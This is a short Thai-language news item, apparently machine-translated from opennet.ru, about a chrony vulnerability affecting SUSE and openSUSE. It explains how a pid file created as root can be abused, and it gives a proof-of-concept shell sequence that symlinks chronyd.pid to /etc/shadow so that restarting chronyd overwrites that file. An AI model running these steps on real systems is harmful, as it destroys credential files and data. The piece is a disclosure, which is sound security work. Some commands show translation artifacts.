В
ช่องโหว่นี้เกิดจากการสร้างไฟล์ pid ที่ไม่ปลอดภัย ซึ่งถูกสร้างขึ้นในขั้นตอนที่ chrony ยังไม่ได้รีเซ็ตสิทธิ์และทำงานเป็น root ในกรณีนี้ ไดเร็กทอรี /run/chrony ซึ่งมีการเขียนไฟล์ pid ถูกสร้างขึ้นด้วยสิทธิ์ 0750 ผ่าน systemd-tmpfiles หรือเมื่อมีการเปิดใช้งาน chronyd โดยเชื่อมโยงกับผู้ใช้และกลุ่ม "chrony" ดังนั้น หากคุณมีสิทธิ์เข้าถึงผู้ใช้ chrony ก็เป็นไปได้ที่จะแทนที่ไฟล์ pid /run/chrony/chronyd.pid ด้วยลิงก์สัญลักษณ์ ลิงก์สัญลักษณ์สามารถชี้ไปที่ไฟล์ระบบใดๆ ที่จะถูกเขียนทับเมื่อเปิดใช้งาน chronyd
root# systemctl หยุด chronyd.service
root# sudo -u chrony /bin/bash
chrony$ cd /run/chrony
chrony$ ln -s /etc/shadow chronyd.pid
ทางออก $ chrony
root# /usr/sbin/chronyd -n
^C
# แทนที่จะเป็นเนื้อหาของ /etc/shadow รหัสกระบวนการ chronyd จะถูกบันทึก
root# cat /etc/shadow
15287
ช่องโหว่
ปัญหา SUSE และ openSUSE
ที่มา: opennet.ru